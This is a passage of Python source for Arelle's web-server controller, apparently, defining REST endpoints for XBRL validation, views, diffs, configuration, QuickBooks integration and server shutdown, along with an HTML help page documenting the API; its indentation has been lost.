if not request.query: # no parameters, index page
return indexPageCGI()
elif 'about' in request.query:
return about(cgiAppPath + "?image=arelle32.gif")
elif 'help' in request.query:
return helpREST()
elif 'image' in request.query:
return image(request.query.image)
else:
return indexPageCGI()
def login_form():
"""Request for a login form (get to */rest/login*). Corresponds to login from other providers of XBRL validation services, but
this version of Arelle does not perform accounting or charges for validation requests, so the login is ignored.
:returns: str -- HTML login form to enter and submit via method=POST these fields: name, password
"""
return _('''<html><body><form method="POST"><table>
<tr><td>Name:</td><td><input name="name" type="text" /></td></tr>
<tr><td>Password:</td><td><input name="password" type="password" /></td></tr>
<tr><td> </td><td><input type="submit" value="Submit" /></td></tr>
</table></form></body></html>''')
def login_submit():
"""Login of fields from login form (post to */rest/login*). Saves user ID for future use.
:param name: User ID
:param password: Password
"""
name = request.forms.get('name')
password = request.forms.get('password')
if checkLogin(name, password):
return _("<p>You are logged in as user: {0}</p>").format(name)
else:
return _("<p>Login failed</p>")
def checkLogin(_user, _password):
"""Save user ID for future use. Password not currently processed.
:returns: bool -- True (for now, future user may interact with authentication and accounting services.)
"""
global user
user = _user
return True
def logout():
"""Request to log out (get */rest/logout*). Removes any proior user ID from session.
:returns: html -- Message that user has logged out
"""
global user
user = None
return _("<p>You are logged out.</p>")
def arelleIcon():
"""Request for icon for URL display (get */favicon.ico*).
:returns: ico -- Icon file for browsers
"""
return static_file("arelle.ico", root=imagesDir, mimetype='image/vnd.microsoft.icon')
def image(imgFile):
"""Request for an image file for URL display (get */images/<imgFile>*).
:returns: image file -- Requested image file from images directory of application for browsers
"""
return static_file(imgFile, root=imagesDir)
validationOptions = {
# these options have no value (after + in query)
"efm": ("validateEFM", True),
"efm-pragmatic": ("disclosureSystemName", "efm-pragmatic"),
"efm-strict": ("disclosureSystemName", "efm-strict"),
"disclosure-system": ("disclosureSystemName", None),
"ifrs": ("gfmName", "ifrs"),
"hmrc": ("gfmName", "hmrc"),
"sbr-nl": ("gfmName", "sbr-nl"),
"utr": ("utrValidate", True),
"infoset": ("infosetValidate", True),
# these parameters pass through the value after + in query
"import": ("importFiles", None),
}
validationKeyVarName = {
# these key names store their value in the named var that differs from key name
"disclosureSystem": "disclosureSystemName",
"roleTypes": "roleTypesFile",
"arcroleTypes": "arcroleTypesFile"
}
class Options():
"""Class to emulate options needed by CntlrCmdLine.run"""
def __init__(self):
for option, defaultValue in optionsPrototype.items():
setattr(self, option, defaultValue)
supportedViews = {'DTS', 'concepts', 'pre', 'cal', 'dim', 'facts', 'factTable', 'formulae', 'roleTypes', 'arcroleTypes'}
def validation(file=None):
"""REST request to validate, by *get* or *post*, to URL patterns including */rest/xbrl/<file:path>/{open|close|validation|DTS...}*,
and */rest/xbrl/{view|open|close}*.
    Sets up CntlrCmdLine options for the request, which is performed by runOptionsAndGetResult using CntlrCmdLine.run with the get or post arguments.
:returns: html, xhtml, xml, json, text -- Return per media type argument and request arguments
"""
errors = []
flavor = request.query.flavor or 'standard'
media = request.query.media or 'html'
requestPathParts = request.urlparts[2].split('/')
isValidation = 'validation' == requestPathParts[-1] or 'validation' == requestPathParts[-2]
view = request.query.view
viewArcrole = request.query.viewArcrole
if request.method == 'POST':
mimeType = request.get_header("Content-Type")
if mimeType.startswith("multipart/form-data"):
_upload = request.files.get("upload")
if not _upload or not _upload.filename.endswith(".zip"):
errors.append(_("POST file upload must be a zip file"))
sourceZipStream = None
else:
sourceZipStream = _upload.file
elif mimeType not in ('application/zip', 'application/x-zip', 'application/x-zip-compressed', 'multipart/x-zip'):
errors.append(_("POST must provide a zip file, Content-Type '{0}' not recognized as a zip file.").format(mimeType))
sourceZipStream = request.body
else:
sourceZipStream = None
if not view and not viewArcrole:
if requestPathParts[-1] in supportedViews:
view = requestPathParts[-1]
if isValidation:
if view or viewArcrole:
errors.append(_("Only validation or one view can be specified in one requested."))
if media not in ('xml', 'xhtml', 'html', 'json', 'text') and not (sourceZipStream and media == 'zip'):
errors.append(_("Media '{0}' is not supported for validation (please select xhtml, html, xml, json or text)").format(media))
elif view or viewArcrole:
if media not in ('xml', 'xhtml', 'html', 'csv', 'json'):
errors.append(_("Media '{0}' is not supported for view (please select xhtml, html, xml, csv, or json)").format(media))
elif requestPathParts[-1] not in ("open", "close"):
errors.append(_("Neither validation nor view requested, nothing to do."))
if (flavor not in ('standard', 'standard-except-formula', 'formula-compile-only', 'formula-compile-and-run')
and not flavor.startswith('edgar') and not flavor.startswith('sec')):
errors.append(_("Flavor '{0}' is not supported").format(flavor))
if view and view not in supportedViews:
errors.append(_("View '{0}' is not supported").format(view))
if errors:
errors.insert(0, _("URL: ") + (file or request.query.file or '(no file)'))
return errorReport(errors, media)
options = Options() # need named parameters to simulate options
isFormulaOnly = False
for key, value in request.query.items():
if key == "file":
setattr(options, "entrypointFile", value)
elif key == "flavor":
if value.startswith("sec") or value.startswith("edgar"):
setattr(options, "validateEFM", True)
elif value == "formula-compile-only":
isFormulaOnly = True
setattr(options, "formulaAction", "validate")
elif value == "formula-compile-and-run":
isFormulaOnly = True
setattr(options, "formulaAction", "run")
elif value == "standard-except-formula":
setattr(options, "formulaAction", "none")
elif key in("media", "view", "viewArcrole"):
pass
elif key in validationOptions:
optionKey, optionValue = validationOptions[key]
setattr(options, optionKey, optionValue if optionValue is not None else value)
elif key in validationKeyVarName:
setattr(options, validationKeyVarName[key], value or True)
elif not value: # convert plain str parameter present to True parameter
setattr(options, key, True)
else:
setattr(options, key, value)
if file:
setattr(options, "entrypointFile", file.replace(';','/'))
requestPathParts = set(request.urlparts[2].split('/'))
viewFile = None
if isValidation:
if not isFormulaOnly:
setattr(options, "validate", True)
elif view:
viewFile = FileNamedStringIO(media)
setattr(options, view + "File", viewFile)
elif viewArcrole:
viewFile = FileNamedStringIO(media)
setattr(options, "viewArcrole", viewArcrole)
setattr(options, "viewFile", viewFile)
return runOptionsAndGetResult(options, media, viewFile, sourceZipStream)
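# Example request (the host and port are whatever was given to --webserver at
# startup; localhost:8080 below is only illustrative):
#   GET http://localhost:8080/rest/xbrl/validation?file=<entry-point-url>&media=json
# runs a standard validation of the entry point and returns the log as JSON.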
def runOptionsAndGetResult(options, media, viewFile, sourceZipStream=None):
"""Execute request according to options, for result in media, with *post*ed file in sourceZipStream, if any.
:returns: html, xml, csv, text -- Return per media type argument and request arguments
"""
if media == "zip" and not viewFile:
responseZipStream = io.BytesIO()
else:
responseZipStream = None
successful = cntlr.run(options, sourceZipStream, responseZipStream)
if media == "xml":
response.content_type = 'text/xml; charset=UTF-8'
elif media == "csv":
response.content_type = 'text/csv; charset=UTF-8'
elif media == "json":
response.content_type = 'application/json; charset=UTF-8'
elif media == "text":
response.content_type = 'text/plain; charset=UTF-8'
elif media == "zip":
response.content_type = 'application/zip; charset=UTF-8'
else:
response.content_type = 'text/html; charset=UTF-8'
if successful and viewFile:
# defeat re-encoding
result = viewFile.getvalue().replace(" ","\u00A0").replace("­","\u00AD").replace("&","&")
viewFile.close()
elif media == "zip":
responseZipStream.seek(0)
result = responseZipStream.read()
responseZipStream.close()
cntlr.logHandler.clearLogBuffer() # zip response file may contain non-cleared log entries
elif media == "xml":
result = cntlr.logHandler.getXml()
elif media == "json":
result = cntlr.logHandler.getJson()
elif media == "text":
_logFormat = request.query.logFormat
if _logFormat:
_stdLogFormatter = cntlr.logHandler.formatter
cntlr.logHandler.formatter = LogFormatter(_logFormat)
result = cntlr.logHandler.getText()
if _logFormat:
cntlr.logHandler.formatter = _stdLogFormatter
del _stdLogFormatter # dereference
else:
result = htmlBody(tableRows(cntlr.logHandler.getLines(), header=_("Messages")))
return result
def diff():
"""Execute versioning diff request for *get* request to */rest/xbrl/diff*.
:returns: xml -- Versioning report.
"""
if not request.query.fromDTS or not request.query.toDTS or not request.query.report:
return _("From DTS, to DTS, and report must be specified")
options = Options()
setattr(options, "entrypointFile", request.query.fromDTS)
setattr(options, "diffFile", request.query.toDTS)
fh = FileNamedStringIO(request.query.report)
setattr(options, "versReportFile", fh)
cntlr.run(options)
reportContents = fh.getvalue()
fh.close()
response.content_type = 'text/xml; charset=UTF-8'
return reportContents
def configure():
"""Set up features for *get* requests to */rest/configure*, e.g., proxy or plug-ins.
:returns: html -- Status of configuration request (e.g., proxy or plug-ins).
"""
if not request.query.proxy and not request.query.plugins and not request.query.packages and 'environment' not in request.query:
return _("proxy, plugins, packages or environment must be specified")
options = Options()
if request.query.proxy:
setattr(options, "proxy", request.query.proxy)
if request.query.plugins:
setattr(options, "plugins", request.query.plugins)
if request.query.packages:
setattr(options, "packages", request.query.packages)
if 'environment' in request.query:
setattr(options, "showEnvironment", True)
cntlr.run(options)
response.content_type = 'text/html; charset=UTF-8'
return htmlBody(tableRows(cntlr.logHandler.getLines(), header=_("Configuration Request")))
def stopWebServer():
"""Stop the web server by *get* requests to */rest/stopWebServer*.
"""
def stopSoon(delaySeconds):
time.sleep(delaySeconds)
import signal
os.kill(_os_pid, signal.SIGTERM)
thread = threading.Thread(target=lambda: stopSoon(2.5))
thread.daemon = True
thread.start()
response.content_type = 'text/html; charset=UTF-8'
return htmlBody(tableRows((time.strftime("Received at %Y-%m-%d %H:%M:%S"),
"Good bye...",),
header=_("Stop Request")))
def quickbooksServer():
"""Interface to QuickBooks server responding to *post* requests to */quickbooks/server.asmx*.
(Part of QuickBooks protocol, see module CntlrQuickBooks.)
"""
from arelle import CntlrQuickBooks
response.content_type = 'text/xml; charset=UTF-8'
return CntlrQuickBooks.server(cntlr, request.body, request.urlparts)
def quickbooksGLrequest(qbReport=None, file=None):
"""Initiate request to QuickBooks server for *get* requests to */rest/quickbooks/<qbReport>/xbrl-gl/...*.
:returns: html, xml, csv, text -- Return per media type argument and request arguments
"""
from arelle.CntlrQuickBooks import supportedQbReports, qbRequest
from arelle.ModelValue import dateTime
errors = []
requestPathParts = request.urlparts[2].split('/')
viewRequested = "view" == requestPathParts[-1]
media = request.query.media or 'html'
fromDate = request.query.fromDate
toDate = request.query.toDate
if qbReport not in supportedQbReports:
errors.append(_("QuickBooks report '{0}' is not supported (please select from: {1})").format(
qbReport, ', '.join(supportedQbReports)))
if media not in ('xml', 'xhtml', 'html'):
errors.append(_("Media '{0}' is not supported for xbrl-gl (please select xhtml, html or xml)").format(media))
if not fromDate or dateTime(fromDate) is None:
errors.append(_("FromDate '{0}' missing or not valid").format(fromDate))
if not toDate or dateTime(toDate) is None:
errors.append(_("ToDate '{0}' missing or not valid").format(toDate))
if errors:
return errorReport(errors, media)
ticket = qbRequest(qbReport, fromDate, toDate, file)
result = htmlBody(tableRows([_("Request queued for QuickBooks...")], header=_("Quickbooks Request")), script='''
<script type="text/javascript">
<!--
var timer = setInterval("autoRefresh()", 1000 * 10);
function autoRefresh(){{location.href = "/rest/quickbooks/response?ticket={0}&media={1}&view={2}";}}
//-->
</script>
'''.format(ticket, media, viewRequested))
return result
def quickbooksGLresponse():
"""Poll for QuickBooks protocol responses for *get* requests to */rest/quickbooks/response*.
:returns: html, xml, csv, text -- Return per media type argument and request arguments, if response is ready, otherwise javascript to requery this *get* request periodically.
"""
from arelle import CntlrQuickBooks
ticket = request.query.ticket
media = request.query.media
viewRequested = request.query.view
status = CntlrQuickBooks.qbRequestStatus.get(ticket)
if not status:
return htmlBody(tableRows([_("QuickBooks ticket not found, request canceled.")], header=_("Quickbooks Request")))
if status.startswith("ConnectionErrorMessage: "):
CntlrQuickBooks.qbRequestStatus.pop(ticket, None)
return errorReport([status[24:]], media)
if status != "Done" or ticket not in CntlrQuickBooks.xbrlInstances:
return htmlBody(tableRows([_("{0}, Waiting 20 seconds...").format(status)],
header=_("Quickbooks Request")),
script='''
<script type="text/javascript">
<!--
var timer = setInterval("autoRefresh()", 1000 * 20);
function autoRefresh(){{clearInterval(timer);self.location.reload(true);}}
//-->
</script>
''')
CntlrQuickBooks.qbRequestStatus.pop(ticket)
instanceUuid = CntlrQuickBooks.xbrlInstances[ticket]
CntlrQuickBooks.xbrlInstances.pop(ticket)
options = Options()
setattr(options, "entrypointFile", instanceUuid)
viewFile = FileNamedStringIO(media)
setattr(options, "factsFile", viewFile)
return runOptionsAndGetResult(options, media, viewFile)
def quickbooksWebPage():
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">Arelle QuickBooks Global Ledger Interface</th></tr>
<tr><td>checkbox</td><td>Trial Balance.</td></tr>
<tr><td>close button</td><td>Done</td></tr>
</table>'''))
def localhostCertificate():
"""Interface to QuickBooks server responding to *get* requests for a host certificate */quickbooks/localhost.crt* or */localhost.crt*.
(Supports QuickBooks protocol.)
:returns: self-signed certificate
"""
return '''
-----BEGIN CERTIFICATE-----
MIIDljCCAn4CAQAwDQYJKoZIhvcNAQEEBQAwgZAxCzAJBgNVBAYTAlVTMRMwEQYD
VQQIEwpDYWxpZm9ybmlhMQ8wDQYDVQQHEwZFbmNpbm8xEzARBgNVBAoTCmFyZWxs
ZS5vcmcxDzANBgNVBAsTBmFyZWxsZTESMBAGA1UEAxMJbG9jYWxob3N0MSEwHwYJ
KoZIhvcNAQkBFhJzdXBwb3J0QGFyZWxsZS5vcmcwHhcNMTIwMTIwMDg0NjM1WhcN
MTQxMDE1MDg0NjM1WjCBkDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCkNhbGlmb3Ju
aWExDzANBgNVBAcTBkVuY2lubzETMBEGA1UEChMKYXJlbGxlLm9yZzEPMA0GA1UE
CxMGYXJlbGxlMRIwEAYDVQQDEwlsb2NhbGhvc3QxITAfBgkqhkiG9w0BCQEWEnN1
cHBvcnRAYXJlbGxlLm9yZzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB
AMJEq9zT4cdA2BII4TG4OJSlUP22xXqNAJdZZeB5rTIX4ePwIZ8KfFh/XWQ1/q5I
c/rkZ5TyC+SbEmQa/unvv1CypMAWWMfuguU6adOsxt+zFFMJndlE1lr3A2SBjHbD
vBGzGJJTivBzDPBIQ0SGcf32usOeotmE2PA11c5en8/IsRXm9+TA/W1xL60mfphW
9PIaJ+WF9rRROjKXVdQZTRFsNRs/Ag8o3jWEyWYCwR97+XkorYsAJs2TE/4zV+8f
8wKuhOrsy9KYFZz2piVWaEC0hbtDwX1CqN+1oDHq2bYqLygUSD/LbgK1lxM3ciVy
ewracPVHBErPlcJFxiOxAw0CAwEAATANBgkqhkiG9w0BAQQFAAOCAQEAM2np3UVY
6g14oeV0Z32Gn04+r6FV2D2bobxCVLIQDsWGEv1OkjVBJTu0bLsZQuNVZHEn5a+2
I0+MGME3HK1rx1c8MrAsr5u7ZLMNj7cjjtFWAUp9GugJyOmGK136o4/j1umtBojB
iVPvHsAvwZuommfME+AaBE/aJjPy5I3bSu8x65o1fuJPycrSeLAnLd/shCiZ31xF
QnJ9IaIU1HOusplC13A0tKhmRMGNz9v+Vqdj7J/kpdTH7FNMulrJTv/0ezTPjaOB
QhpLdqly7hWJ23blbQQv4ILT2CiPDotJslcKDT7GzvPoDu6rIs2MpsB/4RDYejYU
+3cu//C8LvhjkQ==
-----END CERTIFICATE-----
'''
def helpREST():
"""Help web page for *get* requests to */help*.
:returns: html - Table of CntlrWebMain web API
"""
return htmlBody(_('''<table>
<tr><th colspan="2">Arelle web API</th></tr>
<tr><td>/help</td><td>This web page.</td></tr>
<tr><td>/about</td><td>About web page, copyrights, etc.</td></tr>
<tr><th colspan="2">Validation</th></tr>
<tr><td>/rest/xbrl/{file}/validation/xbrl</td><td>Validate document at {file}.</td></tr>
''') +
(_('''
<tr><td>\u00A0</td><td>For an http POST of a zip file (mime type application/zip), {file} is the relative file path inside the zip file.</td></tr>
<tr><td>\u00A0</td><td>For an http GET request, {file} may be a web url, and may have "/" characters replaced by ";" characters
(but that is not necessary).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c.xbrl/validation/xbrl?media=xml</code>: Validate entry instance
document in the POSTed zip archived file c.xbrl and return structured xml results.</td></tr>
<tr><td>/rest/xbrl/validation</td><td>(Alternative syntax) Validate document, file is provided as a parameter (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/validation?file=c.xbrl&media=xml</code>: Validate entry instance
document c.xbrl (in POSTed zip) and return structured xml results.</td></tr>
''')
if cntlr.isGAE else
_('''
<tr><td>\u00A0</td><td>For a browser request or http GET request, {file} may be local or web url, and may have "/" characters replaced by ";" characters
(but that is not necessary).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c:/a/b/c.xbrl/validation/xbrl?media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
<tr><td>\u00A0</td><td>For an http POST of a zip file (mime type application/zip), {file} is the relative file path inside the zip file.</td></tr>
<tr><td>/rest/xbrl/validation</td><td>(Alternative syntax) Validate document, file is provided as a parameter (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/validation?file=c:/a/b/c.xbrl&media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
''')) +
_('''
<tr><td></td><td>Parameters are optional after "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">flavor</td><td><code>standard</code>: XBRL 2.1 and XDT validation. (If formulas are present they will also be compiled and run.) (default)
<br/>{<code>sec</code>*|<code>edgar</code>*}: SEC Edgar Filer Manual validation. (If formulas are present they will also be compiled and run.)
<br/><code>standard-except-formula</code>: XBRL 2.1 and XDT validation. (If formulas are present they will be ignored.)
<br/><code>formula-compile-only</code>: Formulas will be compiled but not run. (No XBRL 2.1, XDT, or disclosure system validation.)
<br/><code>formula-compile-and-run</code>: Formulas will be compiled and run. (No XBRL 2.1, XDT, or disclosure system validation.)</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>json</code>: JSON results.
<br/><code>text</code>: Plain text results (no markup).</td></tr>
<tr><td style="text-indent: 1em;">file</td><td>Alternate way to specify file name or url by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">import</td><td>A list of files to import to the DTS, such as additional formula
or label linkbases. Multiple file names are separated by a '|' character.</td></tr>
<tr><td style="text-indent: 1em;">labelLang</td><td>Label language to override system settings, e.g., <code>&labelLang=ja</code>.</td></tr>
<tr><td style="text-indent: 1em;">labelRole</td><td>Label role instead of standard label, e.g., <code>&labelRole=http://www.xbrl.org/2003/role/verboseLabel</code>. To use the concept QName instead of a label, specify <code>&labelRole=XBRL-concept-name</code>.</td></tr>
<tr><td style="text-indent: 1em;">uiLang</td><td>User interface language to override system settings, e.g., <code>&uiLang=fr</code>. Changes setting for current session (but not saved setting).</td></tr>
<tr><td style="text-indent: 1em;">calcDecimals</td><td>Specify calculation linkbase validation inferring decimals.</td></tr>
<tr><td style="text-indent: 1em;">calcPrecision</td><td>Specify calculation linkbase validation inferring precision.</td></tr>
<tr><td style="text-indent: 1em;">efm-*</td><td>Select Edgar Filer Manual (U.S. SEC) disclosure system validation. (Alternative to flavor parameter.):<br/>
<code>efm-pragmatic</code>: SEC-required rules, currently-allowed years<br/>
<code>efm-strict</code>: SEC-semantic additional rules, currently-allowed years<br/>
<code>efm-pragmatic-all-years</code>: SEC-required rules, all years<br/>
<code>efm-strict-all-years</code>: SEC-semantic additional rules, all years</td></tr>
<tr><td style="text-indent: 1em;">ifrs</td><td>Specify IFRS Global Filer Manual validation.</td></tr>
<tr><td style="text-indent: 1em;">hmrc</td><td>Specify HMRC validation.</td></tr>
<tr><td style="text-indent: 1em;">sbr-nl</td><td>Specify SBR-NL taxonomy validation.</td></tr>
<tr><td style="text-indent: 1em;">utr</td><td>Select validation with respect to Unit Type Registry.</td></tr>
<tr><td style="text-indent: 1em;">infoset</td><td>Select validation with respect to testcase infoset.</td></tr>
<tr><td style="text-indent: 1em;">parameters</td><td>Specify parameters for validation or formula (comma separated name=value[,name2=value2]).</td></tr>
<tr><td style="text-indent: 1em;">formulaAsserResultCounts</td><td>Report formula assertion counts.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarSetExprResult</td><td>Trace variable set formula value, assertion test results.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarSetTiming</td><td>Trace variable set execution times.</td></tr>
<tr><td style="text-indent: 1em;">formulaVarFilterWinnowing</td><td>Trace variable set filter winnowing.</td></tr>
<tr><td style="text-indent: 1em;">{other}</td><td>Other detailed formula trace parameters:<br/>
formulaParamExprResult, formulaParamInputValue, formulaCallExprSource, formulaCallExprCode, formulaCallExprEval,
formulaCallExprResult, formulaVarSetExprEval, formulaFormulaRules, formulaVarsOrder,
formulaVarExpressionSource, formulaVarExpressionCode, formulaVarExpressionEvaluation, formulaVarExpressionResult, formulaVarFiltersResult, and formulaRunIDs.
</td></tr>
<tr><td style="text-indent: 1em;">abortOnMajorError</td><td>Abort process on major error, such as when load is unable to find an entry or discovered file.</td></tr>
<tr><td style="text-indent: 1em;">collectProfileStats</td><td>Collect profile statistics, such as timing of validation activities and formulae.</td></tr>
<tr><td style="text-indent: 1em;">plugins</td><td>Activate plug-ins, specify '|' separated .py modules (relative to plug-in directory).</td></tr>
<tr><td style="text-indent: 1em;">packages</td><td>Activate taxonomy packages, specify '|' separated .zip packages (absolute URLs or file paths).</td></tr>
<tr><th colspan="2">Versioning Report (diff of two DTSes)</th></tr>
<tr><td>/rest/xbrl/diff</td><td>Diff two DTSes, producing an XBRL versioning report relative to report directory.</td></tr>
<tr><td></td><td>Parameters are required after "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">fromDTS</td><td>File name or url of from DTS.</td></tr>
<tr><td style="text-indent: 1em;">toDTS</td><td>File name or url of to DTS.</td></tr>
<tr><td style="text-indent: 1em;">report</td><td>File name or url of to report (to for relative path construction). The report is not written out, but its contents are returned by the web request to be saved by the requestor.</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/diff?fromDTS=c:/a/prev/old.xsd&toDTS=c:/a/next/new.xsd&report=c:/a/report/report.xml</code>: Diff two DTSes and produce versioning report.</td></tr>
<tr><th colspan="2">Views</th></tr>
<tr><td>/rest/xbrl/{file}/{view}</td><td>View document at {file}.</td></tr>
<tr><td>\u00A0</td><td>{file} may be local or web url, and may have "/" characters replaced by ";" characters (but that is not necessary).</td></tr>
<tr><td>\u00A0</td><td>{view} may be <code>DTS</code>, <code>concepts</code>, <code>pre</code>, <code>cal</code>, <code>dim</code>, <code>facts</code>, <code>factTable</code>, <code>formulae</code>, <code>roleTypes</code>, or <code>arcroleTypes</code>.</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/c:/a/b/c.xbrl/dim?media=html</code>: View dimensions of
document at c:/a/b/c.xbrl (on local drive) and return html result.</td></tr>
<tr><td>/rest/xbrl/view</td><td>(Alternative syntax) View document, file and view are provided as parameters (see below).</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>/rest/xbrl/view?file=c:/a/b/c.xbrl&view=dim&media=xml</code>: Validate entry instance
document at c:/a/b/c.xbrl (on local drive) and return structured xml results.</td></tr>
<tr><td></td><td>Parameters are optional after "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>csv</code>: CSV text results (no markup).
<br/><code>json</code>: JSON text results.</td></tr>
<tr><td style="text-indent: 1em;">file</td><td>Alternate way to specify file name or url by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">view</td><td>Alternate way to specify view by a parameter.</td></tr>
<tr><td style="text-indent: 1em;">viewArcrole</td><td>Alternate way to specify view by indicating arcrole desired.</td></tr>
<tr><td style="text-indent: 1em;">import</td><td>A list of files to import to the DTS, such as additional formula
or label linkbases. Multiple file names are separated by a '|' character.</td></tr>
<tr><td style="text-indent: 1em;">factListCols</td><td>A list of column names for facts list. Multiple names are separated by a space or comma characters.
Example: <code>factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions</code></td></tr>
<tr><th colspan="2">Excel interface</th></tr>
<tr><td>GUI operation:</td><td>Select data tab.<br/>Click Get External Data From Web.<br/>
New Web Query dialog, enter rest URI to Address (example, for instance with indicated fact columns:
<code>http://localhost:8080/rest/xbrl/C:/Users/John Doe/Documents/eu/instance.xbrl/facts?media=xhtml&factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions</code><br/>
Before clicking Go, click Options, on Options dialog select Full HTML Formatting, then Ok to Options dialog.<br/>
Click Go.<br/>
Click arrow to select table.<br/>
Click Import button.<br/>
Review insertion cell, click ok on Import Data dialog.</td></tr>
<tr><td>VBA macro:</td><td>
<code>With ActiveSheet.QueryTables.Add(Connection:= _<br/>
"URL;http://localhost:8080/rest/xbrl/C:/Users/John Doe/Documents/eu/instance.xbrl/facts?media=xhtml&factListCols=Label,unitRef,Dec,Value,EntityScheme,EntityIdentifier,Period,Dimensions" _<br/>
, Destination:=Range("$A$1"))<br/>
.Name = "facts"<br/>
.FieldNames = True<br/>
.RowNumbers = False<br/>
.FillAdjacentFormulas = False<br/>
.PreserveFormatting = False<br/>
.RefreshOnFileOpen = False<br/>
.BackgroundQuery = True<br/>
.RefreshStyle = xlInsertDeleteCells<br/>
.SavePassword = False<br/>
.SaveData = True<br/>
.AdjustColumnWidth = True<br/>
.RefreshPeriod = 0<br/>
.WebSelectionType = xlAllTables<br/>
.WebFormatting = xlWebFormattingAll<br/>
.WebPreFormattedTextToColumns = True<br/>
.WebConsecutiveDelimitersAsOne = True<br/>
.WebSingleBlockTextImport = False<br/>
.WebDisableDateRecognition = False<br/>
.WebDisableRedirections = False<br/>
.Refresh BackgroundQuery:=False<br/>
End With</code></td></tr>
<tr><th colspan="2">QuickBooks interface</th></tr>
<tr><td>Setup:</td><td>Install QuickBooks Web Connector by <a href="http://marketplace.intuit.com/webconnector/" target="installWBWC">clicking here</a>.<br/>
Click on QuickBooks.qwc in the Program Files Arelle directory, to install web connector for Arelle. (It specifies localhost:8080 in it.)<br/>
Open your QuickBooks and desired company<br/>
From start menu, programs, QuickBooks, start Web Connector (QBWC). Web connector may want a password, use any string, such as "abcd", as it's not checked at this time.<br/>
Start Arelle web server (if it wasn't already running)<br/>
To request xbrl-gl, select report type (generalLedger, journal, or trialBalance) and specify file name for xbrl-gl output instance.<br/>
QBWC polls once a minute, if impatient, in the QBWC window, click its Arelle checkbox and press the update button.<br/>
(If you get the error [8004041A] from Quickbooks, enable the company file for Arelle access in
Quickbooks: Edit->Preferences...->Integrated Applications->Company Preferences->click allow web access for ArelleWebService)<br/>
</td></tr>
<tr><td style="text-align=right;">Example:</td><td><code>http://localhost:8080/rest/quickbooks/generalLedger/xbrl-gl/C:/mystuff/xbrlGeneralLedger.xbrl/view?fromDate=2011-01-01&toDate=2011-12-31</code>
(You may omit <code>/view</code>.)</td></tr>
<tr><td></td><td>Parameters follow "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">media</td><td><code>html</code> or <code>xhtml</code>: Html text results. (default)
<br/><code>xml</code>: XML structured results.
<br/><code>json</code>: JSON results.
<br/><code>text</code>: Plain text results (no markup).</td></tr>
<tr><td style="text-indent: 1em;">fromDate, toDate</td><td>From & to dates for GL transactions</td></tr>
<tr><th colspan="2">Management</th></tr>
<tr><td>/rest/configure</td><td>Configure settings:</td></tr>
<tr><td></td><td>Parameters are required following "?" character, and are separated by "&" characters,
as follows:</td></tr>
<tr><td style="text-indent: 1em;">proxy</td><td>Show or modify and re-save proxy settings:<br/>
Enter 'show' to view current setting, 'system' to configure to use system proxy setting, 'none' to configure for no proxy, or 'http://[user[:password]@]host[:port]' (e.g., http://192.168.1.253, http://example.com:8080, http://joe:secret@example.com:8080).
</td></tr>
<tr><td style="text-indent: 1em;">plugins</td><td>Show or modify and re-save plug-ins configuration:<br/>
Enter 'show' to view plug-ins configuration, or '|' separated modules:
+url to add plug-in by its url or filename (relative to plug-in directory else absolute), ~name to reload a plug-in by its name, -name to remove a plug-in by its name,
(e.g., '+http://arelle.org/files/hello_web.py', '+C:\Program Files\Arelle\examples\plugin\hello_dolly.py' to load,
~Hello Dolly to reload, -Hello Dolly to remove). (Note that plug-ins are transient on Google App Engine, specify with &plugins to other rest commands.)
</td></tr>
<tr><td style="text-indent: 1em;">packages</td><td>Show or modify and re-save taxonomy packages configuration:<br/>
Enter 'show' to view packages configuration, or '|' separated package URLs:
+url to add package by its full url or filename, ~name to reload a package by its name, -name to remove a package by its name.
(Note that packages are transient on Google App Engine, specify with &packages to other rest commands.)
</td></tr>
<tr><td style="text-indent: 1em;">environment</td><td>Show host environment (config and cache directories).</td></tr>
''') +
(_('''
<tr><td>/rest/stopWebServer</td><td>Shut down (terminate process after 2.5 seconds delay).</td></tr>
''') if not cntlr.isGAE else '') +
'</table>')
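# Illustrative client sketch of the validation API documented in the help text
# above (assumptions: server on localhost:8080 and a local instance path).
# It uses the alternative /rest/xbrl/validation syntax with the file, flavor
# and media parameters described there.
def exampleValidationClient(instanceFile="c:/a/b/c.xbrl"):
    from urllib.request import urlopen
    from urllib.parse import urlencode
    query = urlencode({"file": instanceFile, "flavor": "standard", "media": "json"})
    with urlopen("http://localhost:8080/rest/xbrl/validation?" + query) as resp:
        return resp.read().decode("utf-8")  # structured json validation messages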
def about(arelleImgFile=None):
"""About web page for *get* requests to */about*.
:returns: html - About web page
"""
from lxml import etree
return htmlBody(_('''<table width="700p">
<tr><th colspan="2">About arelle</th></tr>
<tr><td rowspan="12" style="vertical-align:top;"><img src="%s"/></td><td>arelle® version: %s %sbit %s. An open source XBRL platform</td></tr>
